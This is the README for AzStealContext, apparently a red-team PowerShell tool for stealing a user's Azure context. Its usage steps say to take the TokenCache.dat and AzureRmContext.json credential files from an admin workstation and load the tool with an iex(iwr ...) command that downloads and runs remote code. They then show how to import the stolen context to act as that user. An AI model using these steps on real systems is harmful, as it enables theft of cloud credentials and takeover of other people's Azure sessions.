justin-p/AzStealContext/README.md

 # AzStealContext

 A PowerShell function that automates the process of stealing the Azure context of a users .Azure folder.

+The AzureRmContext file can have multiple 'contexts'.
+This happens if the `Connect-AzAccount` is run multiple times by the same user with different credentials.
+This function will verify if there are multiple contexts and if so, will ask you which one to use as the default context.

+## Usage
+1. Find a Admin workstation / Userprofile that has the `.Azure` folder.
+2. 'Borrow' the `TokenCache.dat` and `AzureRmContext.json` files.
+3. Load this function. `iex(iwr https://raw.githubusercontent.com/justin-p/AzStealContext/master/Invoke-AzStealContext.ps1).content)`
+4. Run the function
+   - To prepair a AzContext file: `Invoke-AzStealContext -Path 'Path\To\Borrowed\Files'`
+   - To prepair and Import a AzContext file: `Invoke-AzStealContext -Path 'Path\To\Borrowed\Files' -ImportContext`
+   - Overwrite a existing OutFile: `Invoke-AzStealContext -Path 'Path\To\Borrowed\Files' -ImportContext -Force`
+   - To change the default OutFile `Invoke-AzStealContext -Path 'Path\To\Borrowed\Files' -OutFile 'CustomFilename.json'`

+# Contributing

+Feel free to open issues, contribute and submit your Pull Requests.
+You can also ping me on Twitter (@JustinPerdok)